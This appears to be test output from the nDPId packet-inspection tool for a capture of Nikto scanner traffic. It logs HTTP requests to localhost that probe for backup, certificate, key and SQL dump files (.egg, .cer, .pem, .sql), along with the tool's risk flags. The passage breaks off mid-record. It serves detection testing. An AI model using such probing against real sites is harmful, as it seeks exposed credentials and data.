{"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
